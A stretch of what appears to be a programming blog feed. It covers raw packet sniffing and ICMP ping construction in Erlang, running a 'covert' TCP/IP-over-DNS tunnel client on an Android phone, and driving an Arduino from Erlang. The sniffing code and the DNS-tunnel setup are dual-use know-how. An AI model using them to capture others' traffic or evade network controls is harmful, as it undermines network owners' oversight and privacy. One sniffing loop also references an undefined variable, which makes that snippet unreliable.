</ul><h3>Receving Packets using recvfrom()</h3>To send and receive packets from a socket using PF_PACKET, the normal connection-less socket operations are used: <a href="http://linux.die.net/man/2/sendto">sendto()</a> and <a href="http://linux.die.net/man/2/recvfrom">recvfrom()</a>. By default, socket operations will block, unless the O_NONBLOCK flag is set using fcntl(). The <a href="http://www.erlang.org/doc/man/gen_udp.html">gen_udp</a> module in Erlang internally calls recvfrom(), so it can deal with raw sockets. Another <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">example of using gen_udp</a> in this way is for sending ICMP packets and reading the ICMP ECHO replies. Alternatively, I've added a <a href="http://github.com/msantos/procket/blob/master/c_src/procket.c#L147">recvfrom/2</a> function to the procket NIF for testing. <h3>Sniffing Packets in Erlang</h3>To read packets from the network device, either gen_udp or the NIF recvfrom/2 can be used. Using gen_udp: <pre class="Code"><span class="Type">-module</span>(packet)<span class="Special">.</span>
<span class="Type">-export</span>([sniff<span class="Statement">/</span><span class="Constant">0</span>])<span class="Special">.</span>
<span class="Type">-define</span>(ETH_P_IP, <span class="Constant">16</span>#<span class="Constant">0008</span>)<span class="Special">.</span>
<span class="Type">-define</span>(ETH_P_ALL, <span class="Constant">16</span>#<span class="Constant">0300</span>)<span class="Special">.</span>
sniff() <span class="Statement">-></span>
{ok, S} <span class="Statement">=</span> <span class="Identifier">procket:listen</span>(<span class="Constant">0</span>, [
{protocol, ?ETH_P_ALL},
{type, raw},
{family, packet}
]),
<span class="Special">{</span>ok, <span class="Identifier">S1</span><span class="Special">}</span> <span class="Statement">=</span> gen_udp:open(<span class="Constant">0</span>, <span class="Special">[</span>binary, <span class="Special">{</span>fd, <span class="Identifier">S</span><span class="Special">}</span>, <span class="Special">{</span>active, <span class="Constant">false</span><span class="Special">}</span><span class="Special">]</span>),
loop(S1)<span class="Special">.</span>
loop(S) <span class="Statement">-></span>
Data <span class="Statement">=</span> <span class="Identifier">gen_udp:recv</span>(S, <span class="Constant">2048</span>),
<span class="Identifier">error_logger:info_report</span>([{data, Data}]),
loop(State)<span class="Special">.</span>
</pre>The definitions of ETH_P_IP and ETH_P_ALL are in big endian format. The port is irrelevant and is set to 0 in procket:listen/2. The type is <i>raw</i> but can also be set to <i>dgram</i>. Using the NIF, the process must poll the socket. procket:recvfrom/2 will return the atom <i>nodata</i> if the socket returns EAGAIN; the tuple {ok, binary} with the binary data representing the packet or a tuple holding the value of errno, e.g., {error, {errno, strerror(errno)}}. The return values will probably change in the future. <pre class="Code">sniff() <span class="Statement">-></span>
{ok, S} <span class="Statement">=</span> <span class="Identifier">procket:listen</span>(<span class="Constant">0</span>, [
{protocol, ?ETH_P_ALL},
{type, raw},
{family, packet}
]),
loop(S)<span class="Special">.</span>
loop(S) <span class="Statement">-></span>
<span class="Statement">case</span> <span class="Identifier">procket:recvfrom</span>(S, <span class="Constant">2048</span>) <span class="Statement">of</span>
nodata <span class="Statement">-></span>
<span class="Special">timer</span><span class="Special">:</span>sleep(<span class="Constant">1000</span>),
loop(S);
{ok, Data} <span class="Statement">-></span>
<span class="Identifier">error_logger:info_report</span>([{data, Data}]),
loop(S);
Error <span class="Statement">-></span>
<span class="Identifier">error_logger:error_report</span>(Error)
<span class="Statement">end</span>.
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-53564520241657278692010-05-24T16:28:00.004-04:002011-01-25T13:05:19.709-05:00ICMP Ping in Erlang(Also see <a href="http://blog.listincomprehension.com/2010/12/icmp-ping-in-erlang-part-2.html">ICMP Ping in Erlang, part 2</a>)<br />
<h2>ICMP ECHO Packet Structure</h2><br />
<a href="http://www.faqs.org/rfcs/rfc792.html">RFC 792</a> describes an ICMP ECHO packet as:<br />
<ul class="Message"><li class="Message">Type:8</li>
<li class="Message">Code:8</li>
<li class="Message">Checksum:16</li>
<li class="Message">Identifier:16</li>
<li class="Message">Sequence Number:16</li>
<li class="Message">Data1:8</li>
<li class="Message">...</li>
<li class="Message">DataN:8</li>
</ul><br />
The number after the colon represents the number of bits in the field.<br />
<ul><li>The <i>type</i> field for ICMP ECHO is set to 8. The response (ICMP ECHO REPLY) has a value of 0.<br />
<li>The <i>code</i> is 0. <br />
<li>The <i>checksum</i> is a one's complement checksum that covers both the ICMP header and the data portion of the packet. An Erlang version looks like:<br />
<pre class="Code">makesum(Hdr) <span class="Statement">-></span> <span class="Constant">16</span>#<span class="Constant">FFFF</span> <span class="Statement">-</span> checksum(Hdr)<span class="Special">.</span>
checksum(Hdr) <span class="Statement">-></span>
<span class="Identifier">lists:foldl</span>(<span class="Statement">fun</span> compl<span class="Statement">/</span><span class="Constant">2</span>, <span class="Constant">0</span>, [ W || <span class="Statement"><<</span><span class="Identifier">W:16</span><span class="Statement">>></span> <span class="Statement"><=</span> Hdr ])<span class="Special">.</span>
compl(N) <span class="Statement">when</span> N <span class="Statement">=<</span> <span class="Constant">16</span>#<span class="Constant">FFFF</span> <span class="Statement">-></span> N;
compl(N) <span class="Statement">-></span> (N <span class="Statement">band</span> <span class="Constant">16</span>#<span class="Constant">FFFF</span>) <span class="Statement">+</span> (N <span class="Statement">bsr</span> <span class="Constant">16</span>)<span class="Special">.</span>
compl(<span class="Identifier">N</span>,<span class="Identifier">S</span>) <span class="Statement">-></span> compl(<span class="Identifier">N</span><span class="Statement">+</span><span class="Identifier">S</span>).
</pre><li>The <i>identifier</i> and <i>sequence number</i> allow clients on a host to differentiate their packets, for example, if multiple ping's are running. The client will usually increment the sequence number for each ICMP ECHO packet sent.<br />
<li>Data is the payload. Traditionally, it holds a <i>struct timeval</i> so the client can calculate the delay without having to maintain state, but any value can be used, such as the output of <b>erlang:now/0</b>. The remainder is padded with ASCII characters.<br />
</ul>The description of an ICMP packet in Erlang is very close to the specification. For ICMP ECHO: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">8:8</span>, <span class="Identifier">0:8</span>, <span class="Identifier">Checksum:16</span>, <span class="Identifier">Id:16</span>, <span class="Identifier">Sequence:16</span>, Payload<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>
</pre>The ICMP ECHO reply is the same packet returned, with the <i>type</i> field set to 0 and an updated checksum: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">0:8</span>, <span class="Identifier">0:8</span>, <span class="Identifier">Checksum:16</span>, <span class="Identifier">Id:16</span>, <span class="Identifier">Sequence:16</span>, Payload<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>
</pre><h2>Opening a Socket</h2>Sending out ICMP packets requires opening a raw socket. Aside from the issues of having the appropriate privileges, Erlang does not have native support for handling raw sockets. I used <a href="http://blog.listincomprehension.com/search/label/procket">procket</a> to handle the privileged socket operations and pass the file descriptor into Erlang. Once the socket is returned to Erlang, we can perform operations on it as an unprivileged user. Since there isn't a gen_icmp module, we need some way of calling sendto()/recvfrom() on the socket. gen_udp uses sendto(), so we can misuse it (with some quirks) for our icmp packets. <pre class="Code"><span class="Comment">% Get an ICMP raw socket</span>
{ok, FD} <span class="Statement">=</span> <span class="Identifier">procket:listen</span>(<span class="Constant">0</span>, [{protocol, icmp}]),<span class="Comment">
% Use the file descriptor to create an Erlang socket structure</span>
{ok, S} <span class="Statement">=</span> <span class="Identifier">gen_udp:open</span>(<span class="Constant">0</span>, [<span class="Identifi
er">binary</span>, {fd, FD}]),
</pre>The port is meaningless, so <i>0</i> is passed in as an argument. We create the packet payload twice: first with a zero'ed checksum, then with the results of the checksum. <pre class="Code">make_packet(Id, Seq) <span class="Statement">-></span>
{Mega,Sec,USec} <span class="Statement">=</span> <span class="Identifier">erlang:now</span>(),
Payload <span class="Statement">=</span> <span class="Identifier">list_to_binary</span>(<span class="Identifier">lists:seq</span>(<span class="Constant">32</span>, <span class="Constant">75</span>)),
CS <span class="Statement">=</span> makesum(<span class="Statement"><<</span>?<span class="Identifier">ICMP_ECHO:8</span>, <span class="Identifier">0:8</span>, <span class="Identifier">0:16</span>, <span class="Identifier">Id:16</span>, <span class="Identifier">Seq:16</span>, <span class="Identifier">Mega:32</span>, <span class="Identifier">Sec:32</span>, <span class="Identifier">USec:32</span>, Payload<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>),
<span class="Statement"><<</span>
<span class="Identifier">8:8</span>, <span class="Comment">% Type</span>
<span class="Identifier">0:8</span>, <span class="Comment">% Code</span>
<span class="Identifier">CS:16</span>, <span class="Comment">% Checksum</span>
<span class="Identifier">Id:16</span>, <span class="Comment">% Id</span>
<span class="Identifier">Seq:16</span>, <span class="Comment">% Sequence</span>
<span class="Identifier">Mega:32</span>, <span class="Identifier">Sec:32</span>, <span class="Identifier">USec:32</span>, <span class="Comment">% Payload: time</span>
Payload<span class="Statement">/</span><span class="Identifier">binary</span>
<span class="Statement">>></span><span class="Special">.</span>
</pre>The packet can be sent via the raw socket using gen_udp:send/4, with the port again set to 0. <pre class="Code">ok <span class="Statement">=</span> <span class="Identifier">gen_udp:send</span>(S, IP, <span class="Constant">0</span>, Packet)
</pre>Since we're abusing gen_udp, we can wait for a message to be sent to the process: <pre class="Code"><span class="Statement">receive</span>
{udp, S, _IP, _Port, <span class="Statement"><<</span><span class="Identifier">_:20</span><span class="Statement">/</span>bytes, Data<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">-></span>
{ICMP, <span class="Statement"><<</span><span class="Identifier">Mega:32</span><span class="Statement">/</span><span class="Identifier">integer</span>, <span class="Identifier">Sec:32</span><span class="Statement">/</span><span class="Identifier">integer</span>, <span class="Identifier">Micro:32</span><span class="Statement">/</span><span class="Identifier">integer</span>, Payload<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">=</span> icmp(Data),
<span class="Identifier">error_logger:info_report</span>([
{type, ICMP#icmp<span class="Special">.</span>type},
{code, ICMP#icmp<span class="Special">.</span>code},
{checksum, ICMP#icmp<span class="Special">.</span>checksum},
{id, ICMP#icmp<span class="Special">.</span>id},
{sequence, ICMP#icmp<span class="Special">.</span>sequence},
{payload, Payload},
{<span class="Identifier">time</span>, <span class="Special">timer</span><span class="Special">:</span>now_diff(<span class="Identifier">erlang:now</span>(), {Mega, Sec, Micro})}
]),
<span class="Statement">after</span>
<span class="Constant">5000</span> <span class="Statement">-></span>
<span class="Identifier">error_logger:error_report</span>([{noresponse, Packet}])
<span class="Statement">end</span>
</pre>In the above code snippet, you may have noticed the first 20 bytes of the payload is stripped off. Comparing the ICMP packet we sent and the response handed to the process by gen_udp: <pre class="Code">icmp: <span class="Statement"><<</span><span class="Constant">8</span>,<span class="Constant">0</span>,<span class="Constant">186</span>,<span class="Constant">30</span>,<span class="Constant">80</span>,<span class="Constant">228</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">4</span>,<span class="Constant">250</span>,<span class="Constant">0</span>,<span class="Constant">12</span>,<span class="Constant">16</span>,<span class="Constant">77</span>,<span class="Constant">0</span>,<span class="Constant">1</span>,<span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">32</span>,<span class="Constant">33</span>,<span class="Constant">34</span>,<span class="Constant">35</span>,<span class="Constant">36</span>,
<span class="Constant">37</span>,<span class="Constant">38</span>,<span class="Constant">39</span>,<span class="Constant">40</span>,<span class="Constant">41</span>,<span class="Constant">42</span>,<span class="Constant">43</span>,<span class="Constant">44</span>,<span class="Constant">45</span>,<span class="Constant">46</span>,<span class="Constant">47</span>,<span class="Constant">48</span>,<span class="Constant">49</span>,<span class="Constant">50</span>,<span class="Constant">51</span>,<span class="Constant">52</span>,<span class="Constant">53</span>,<span class="Constant">54</span>,<span class="Constant">55</span>,<span class="Constant">56</span>,<span class="Constant">57</span>,<span class="Constant">58</span>,
<span class="Constant">59</span>,<span class="Constant">60</span>,<span class="Constant">61</span>,<span class="Constant">62</span>,<span class="Constant">63</span>,<span class="Constant">64</span>,<span class="Constant">65</span>,<span class="Constant">66</span>,<span class="Constant">67</span>,<span class="Constant">68</span>,<span class="Constant">69</span>,<span class="Constant">70</span>,<span class="Constant">71</span>,<span class="Constant">72</span>,<span class="Constant">73</span>,<span class="Constant">74</span>,<span class="Constant">75</span><span class="Statement">>></span>
response: <span class="Statement"><<</span><span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">84</span>,<span class="Constant">101</span>,<span class="Constant">155</span>,<span class="Constant">64</span>,<span class="Constant">0</span>,<span class="Constant">64</span>,<span class="Constant">1</span>,<span class="Constant">154</span>,<span class="Constant">44</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">220</span>,<span class="Constant">187</span>,<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">220</span>,
<span class="Constant">212</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">194</span>,<span class="Constant">30</span>,<span class="Constant">80</span>,<span class="Constant">228</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">4</span>,<span class="Constant">250</span>,<span class="Constant">0</span>,<span class="Constant">12</span>,<span class="Constant">16</span>,<span class="Constant">77</span>,<span class="Constant">0</span>,<span class="Constant">1</span>,<span class="Constant">69</span>,<span class="Constant">0</span>,<span class="Constant">32</span>,<span class="Constant">33</span>,
<span class="Constant">34</span>,<span class="Constant">35</span>,<span class="Constant">36</span>,<span class="Constant">37</span>,<span class="Constant">38</span>,<span class="Constant">39</span>,<span class="Constant">40</span>,<span class="Constant">41</span>,<span class="Constant">42</span>,<span class="Constant">43</span>,<span class="Constant">44</span>,<span class="Constant">45</span>,<span class="Constant">46</span>,<span class="Constant">47</span>,<span class="Constant">48</span>,<span class="Constant">49</span>,<span class="Constant">50</span>,<span class="Constant">51</span>,<span class="Constant">52</span>,<span class="Constant">53</span>,<span class="Constant">54</span>,
<span class="Constant">55</span>,<span class="Constant">56</span>,<span class="Constant">57</span>,<span class="Constant">58</span>,<span class="Constant">59</span>,<span class="Constant">60</span>,<span class="Constant">61</span>,<span class="Constant">62</span>,<span class="Constant">63</span>,<span class="Constant">64</span>,<span class="Constant">65</span>,<span class="Constant">66</span>,<span class="Constant">67</span>,<span class="Constant">68</span>,<span class="Constant">69</span>,<span class="Constant">70</span>,<span class="Constant">71</span>,<span class="Constant">72</span>,<span class="Constant">73</span>,<span class="Constant">74</span>,<span class="Constant">75</span><span class="Statement">>></span>
</pre>While the process sent a 64 byte ICMP packet, gen_udp hands it an 84 byte packet which includes the 20 byte IPv4 header. An <a href="http://github.com/msantos/procket/blob/master/src/icmp.erl">example of an Erlang ping</a> is included with <a href="http://github.com/msantos/procket">procket</a> on github. The example will just print out the packets using error_logger:info_report/1: <pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">icmp:ping</span>(<span class="Constant">"192.168.213.1"</span>)<span class="Special">.</span>
<span class="Statement">=</span>INFO REPORT<span class="Statement">====</span> <span class="Constant">24</span><span class="Statement">-</span>May<span class="Statement">-</span><span class="Constant">2010</span><span class="Special">::</span><span class="Identifier">16:21</span><span class="Special">:</span><span class="Constant">37</span> <span class="Statement">===</span>
<span class="Identifier">type: 0</span>
<span class="Identifier">code: 0</span>
<span class="Identifier">checksum: 52034</span>
<span class="Identifier">id: 14837</span>
<span class="Identifier">sequence: 0</span>
payload<span class="Special">:</span> <span class="Statement"><<</span><span class="Constant">" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK"</span><span class="Statement">>></span>
<span class="Identifier">time</span><span class="Special">:</span> <span class="Constant">16790</span>
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-18897393989312755682010-04-28T16:52:00.001-04:002011-03-13T10:23:17.513-04:00DNS Tunnelling on AndroidI have a <a href="http://en.wikipedia.org/wiki/Motorola_Milestone">Motorola Milestone</a>, its somewhat awesome, but what would make it awesome-er is ... <a href="http://blog.listincomprehension.com/2009/11/sods-socket-over-dns-tunneling-service.html">tunnelling TCP/IP over DNS</a>! Any device that can support covert, high latency, text based network protocols should. And rooting the phone isn't required.<br />
<br />
It turns out it is suprisingly easy to get simple C code running on an Android phone, if you don't mind statically compiling and don't have many dependencies. The results are sort of bloated though.<br />
<br />
You can download a precompiled <a href="http://github.com/msantos/sods">sods</a> client (<b>sdt</b>) for Android (the binary will also work on Nokia tablets running <a href="http://maemo.org/">Maemo</a>) from <a href="http://github.com/downloads/msantos/sods/android-arm-sdt.bz2">here</a>. I compiled <b>sdt</b> using <a href="http://www.scratchbox.org/">scratchbox</a>. You'll need a <a href="http://github.com/msantos/sods">sods</a> server and a domain set up, of course (<a href="http://blog.listincomprehension.com/2009/12/sods-care-and-feeding-of.html">here are instructions</a>).<br />
<br />
Copy <b>sdt</b> to your phone. I moved it to the sd card.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://connectbot.googlecode.com/svn/trunk/www/qr-code.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://connectbot.googlecode.com/svn/trunk/www/qr-code.png" /></a></div>If you don't have <a href="http://code.google.com/p/connectbot">ConnectBot</a> installed, get it from the Android market now. Start up ConnectBot and create a new <b>local</b> host. This will start a shell on the phone.<br />
<br />
Change to the ConnectBot data directory; we'll use it to hold the sods client.<br />
<pre class="Code"><span class="Statement">cd</span> /data/data/org.connectbot
</pre>Create a new directory or use the <i>files</i> directory (I have no idea what will happen to these directories when ConnectBot is upgraded).<br />
<pre class="Code"><span class="Statement">mkdir</span> bin
<span class="Statement">cd</span> bin
</pre>Copy <b>sdt</b> and change the permissions:<br />
<pre class="Code">cp /sdcard/tmp/sdt .
chmod <span class="Constant">744</span> sdt
./sdt <span class="Special">-h</span>
</pre>Now create a new <b>local</b> host to run <b>sdt</b>. Do a long press on the new entry and select "Edit Host".<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjzRj1RTyCreMwe0LIz917d4RUPqmQ9BysWR396p_7Pl3QasW5xY-sfcB6D-AIB2WILt0RAAZHHnjDWKeZlmFE9NSo3nDg3NHa2dXTrMhTQ2H2Mh5g4wXe18GagQIv968ufXoiOCnIFf0/s1600/sdt-edithost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjzRj1RTyCreMwe0LIz917d4RUPqmQ9BysWR396p_7Pl3QasW5xY-sfcB6D-AIB2WILt0RAAZHHnjDWKeZlmFE9NSo3nDg3NHa2dXTrMhTQ2H2Mh5g4wXe18GagQIv968ufXoiOCnIFf0/s320/sdt-edithost.png" /></a></div>Choose the "Post-login automation" item. This will let us run commands when the shell is started.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBCIc7BNBgkYUhZ5DcZyo4QJ0qu6OjdBQcTfizoHUTvgAyme_n0wbvfQIdSPCphXUhwH8Bju602iOgfu1vOBLplm_8duaDICMLH6E4M5PpVkOimJOMRdN8BDCPjN2EAx6uGbiUiVy5m0/s1600/sdt-postlogin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBCIc7BNBgkYUhZ5DcZyo4QJ0qu6OjdBQcTfizoHUTvgAyme_n0wbvfQIdSPCphXUhwH8Bju602iOgfu1vOBLplm_8duaDICMLH6E4M5PpVkOimJOMRdN8BDCPjN2EAx6uGbiUiVy5m0/s320/sdt-postlogin.png" /></a></div>The flags to <b>sdt</b> can be manually specified or wrapped in a shell script.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-qfIcTob61sNw6j1pcUcFjdUdKFTIv148oGOmglILI6BwFWB8N_Z98_n8J0E5VQmaE6e4UDdNe5MlCH3DcKzodjhzIv0JcJFGqHxiho5bHJ-pSwKkyT7y_weZYp5UBmEnFvYEITjxXZE/s1600/sdt-cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-qfIcTob61sNw6j1pcUcFjdUdKFTIv148oGOmglILI6BwFWB8N_Z98_n8J0E5VQmaE6e4UDdNe5MlCH3DcKzodjhzIv0JcJFGqHxiho5bHJ-pSwKkyT7y_weZYp5UBmEnFvYEITjxXZE/s320/sdt-cmd.png" /></a></div>Here is an example shell script (called <i>sd</i>):<br />
<pre class="Code"><span class="Comment">#!/system/bin/sh</span>
<span class="Identifier">PORT</span>=<span class="Constant">22220</span>
<span class="Identifier">S</span>=<span class="PreProc">${</span><span class="PreProc">1</span><span class="Statement">:-</span><span class="Error">0</span><span class="PreProc">}</span>
<span class="Identifier">PORT</span>=<span class="Error">$(</span><span class="Statement">(</span><span class="Special">PORT+</span><span class="PreProc">$S</span><span class="Statement">)</span><span class="Error">)</span>
<span class="Identifier">T</span>=<span class="PreProc">${</span><span class="PreProc">2</span><span class="Statement">:-</span><span class="Error">TXT</span><span class="PreProc">}</span>
<span class="Identifier">NS1</span>=<span class="Special">`getprop net.dns1`</span>
<span class="Identifier">NS</span>=<span class="PreProc">${</span><span class="PreProc">3</span><span class="Statement">:-</span><span class="PreProc">$NS1</span><span class="PreProc">}</span>
./sdt <span class="Special">-t</span> <span class="PreProc">$T</span> <span class="Special">-r</span> <span class="PreProc">$NS</span> <span class="Special">-p</span> <span class="PreProc">$PORT</span> <span class="Special">-s</span> <span class="PreProc">$S</span> <span class="Special">-vvvv</span> x.a.example.com x.b.example.com x.n.example.com
</pre>Create a new <b>ssh</b> host, connecting to localhost and whatever port sdt has been configured to listen on (using the <i>-p</i> flag).<br />
<br />
Test it out. In the ConnectBot host list, select the <b>sdt</b> host.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXm1NQfpfPDxGHHUteNJZr16IXS2rcsm96Ap-dd2IxbpiHqi71Kb7XWYOOWRyyoCFi_dHIeTBZVNZqGroMyH6Twjjw8eyS_Cx1atSoRB_79xaDS1ygZgGl67cWwPLanKGKZexU06Z8Bks/s1600/sdt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXm1NQfpfPDxGHHUteNJZr16IXS2rcsm96Ap-dd2IxbpiHqi71Kb7XWYOOWRyyoCFi_dHIeTBZVNZqGroMyH6Twjjw8eyS_Cx1atSoRB_79xaDS1ygZgGl67cWwPLanKGKZexU06Z8Bks/s320/sdt.png" /></a></div>Hit the back button, then select the <b>ssh</b> host.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKDBjPJOIN2Q5xegZv18KZcHuZ0RfaUrB5zq0Zvky1bQJfGlJnFIz9JeQslT4oKmZiw4Pp3O2SgWzmmJSAmAxo5-rRgnE1Zt7NYochLREakqs2D6bV4bS-oB0FoilRiMQNMhBAmjwRwtg/s1600/sdt2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKDBjPJOIN2Q5xegZv18KZcHuZ0RfaUrB5zq0Zvky1bQJfGlJnFIz9JeQslT4oKmZiw4Pp3O2SgWzmmJSAmAxo5-rRgnE1Zt7NYochLREakqs2D6bV4bS-oB0FoilRiMQNMhBAmjwRwtg/s320/sdt2.png" /></a></div>If everything works out, a glorious, if slow, ssh session over DNS should be the reward.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtrRWY-HsVyYgWha6jIpWRwZmyYGfScxpZyg1D-QLwlktjgX9RSAr_NVa95kIw6aRS_-3nrjFEbiS54TujvqDuMO-YqqA1lvfNvQ_DiJqDdlTlOVl3CXM4pKzbleYyooCPhCQM4r7RrGE/s1600/sdt3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtrRWY-HsVyYgWha6jIpWRwZmyYGfScxpZyg1D-QLwlktjgX9RSAr_NVa95kIw6aRS_-3nrjFEbiS54TujvqDuMO-YqqA1lvfNvQ_DiJqDdlTlOVl3CXM4pKzbleYyooCPhCQM4r7RrGE/s320/sdt3.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPDVc4-jHMmgr2Bv_SHNV2WJlp3HBm9INCFa0kWmekN7eid-kE_Mgqwo9pyfv-iJmUwKIv4f2O1HMy9AyQpcMbla6gN3OQXjDLAZGtp-6X-yo9AiKP8hQ3SKy46O99utp9s6TSggupEZM/s1600/sdt-login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPDVc4-jHMmgr2Bv_SHNV2WJlp3HBm9INCFa0kWmekN7eid-kE_Mgqwo9pyfv-iJmUwKIv4f2O1HMy9AyQpcMbla6gN3OQXjDLAZGtp-6X-yo9AiKP8hQ3SKy46O99utp9s6TSggupEZM/s320/sdt-login.png" /></a></div>After login, run GNU screen (in case the connection drops). I usually run console apps, but ConnectBot supports port forwarding for those times you need to run send data from other apps over the tunnel (forwarding through a proxy like <a href="http://ziproxy.sourceforge.net/">ziproxy</a> works well). <br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn7OSHB4i38ehMhPeRBiA-YeyrsBlnxiO3P3HxXA9exDgdBQOGWUHu_wJ0jnQnlge4XOaZI4zTWkNeUZRgDUMT6rEr0JsUT0bYWC2_W9LqjZvRgDEs_DOwlYle_Ofi7vNSvcGjuDvu4dY/s1600/sdt-cim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn7OSHB4i38ehMhPeRBiA-YeyrsBlnxiO3P3HxXA9exDgdBQOGWUHu_wJ0jnQnlge4XOaZI4zTWkNeUZRgDUMT6rEr0JsUT0bYWC2_W9LqjZvRgDEs_DOwlYle_Ofi7vNSvcGjuDvu4dY/s320/sdt-cim.png" /></a></div><div style="text-align: center;"><a href="http://www.centerim.org/index.php/Main_Page">centerim</a>: IRC over SSH over TCP/IP over DNS</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL1czB7gg9E8rffpx5A0cuvM6cWhLxZGcYJRto706v96xu-on2ybdOwkw6zxnNWrPfjfBsXq05l_w_4y577s_Zlw0Ed3LYR2ZJKFK5Qg7D52wPH__DOSzXK4XsIEyOgpr_Ma0u0WeF1Eg/s1600/sdt-w3m.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL1czB7gg9E8rffpx5A0cuvM6cWhLxZGcYJRto706v96xu-on2ybdOwkw6zxnNWrPfjfBsXq05l_w_4y577s_Zlw0Ed3LYR2ZJKFK5Qg7D52wPH__DOSzXK4XsIEyOgpr_Ma0u0WeF1Eg/s320/sdt-w3m.png" /></a></div><div style="text-align: center;">Web browsing over DNS on a phone using <a href="http://w3m.sourceforge.net/">w3m</a></div>
<p>
<h2>Update: 2011-03-13</h2>
I've switched phones to an <a href="http://en.wikipedia.org/wiki/HTC_Desire_Z">HTC Desire Z</a> (running Android 2.2) and one of my first tasks was to get sods running on it.
<ol>
<li>I was getting permission errors copying from the sdcard to the connectbot directory so I resorted to using "cat":
<pre><code>
cd /data/data/org.connectbot/bin
cat /sdcard/tmp/sdt > sdt
chmod 755 sdt
./sdt -h
</code></pre>
<li>If you are having problems connecting to the sods server, make sure another sdt process is not running. To do this, run "ps" and "kill" from the ConnectBot shell or kill the ConnectBot application.
</ol>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8577871288924093307.post-34644493541329323162010-04-12T21:02:00.000-04:002013-01-08T15:14:14.145-05:00Accessing an Arduino from Erlang(2013-01-08: There is a native Erlang interface to Unix serial ports here: <a href="https://github.com/msantos/srly">srly</a>. See the readme for the API. It should work on Mac OS X, BSD and Linux.<br />
And, if you want to load code to the Arduino directly from Erlang, try this: <a href="https://github.com/msantos/stk500">stk500</a>)<br />
<br />
First we'll need to upload a sketch to the <a href="http://en.wikipedia.org/wiki/Arduino">Arduino</a>. There are many examples floating around. Here is a simple one to control LED's. Yes, not exactly novel.<br />
<script src="http://gist.github.com/364185.js?file=LED.pde">
</script><br />
You will need to modify the definitions of FPIN and LPIN to match the first and last digital pins the LED's are plugged into. Compile and upload the sketch.<br />
<br />
The lights are set as a bitmask. For example, to activate the first LED, send the integer 1; for the third LED, send 4; and for both the first and third LED, send 5. If you defined the DEBUG macro, you can test from the serial monitor by sending the ASCII representation of the numbers.<br />
<br />
Now download and compile the <a href="http://github.com/msantos/erlang-serial">erlang-serial</a> port driver. Start up Erlang:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> Pid <span class="Statement">=</span> <span class="Identifier">serial:start</span>([{open, <span class="Constant">"/dev/ttyUSB0"</span>}, {speed, <span class="Constant">9600</span>}])<span class="Special">.</span>
<span class="Statement"><</span><span class="Constant">0.47</span><span class="Special">.</span><span class="Constant">0</span><span class="Statement">></span>
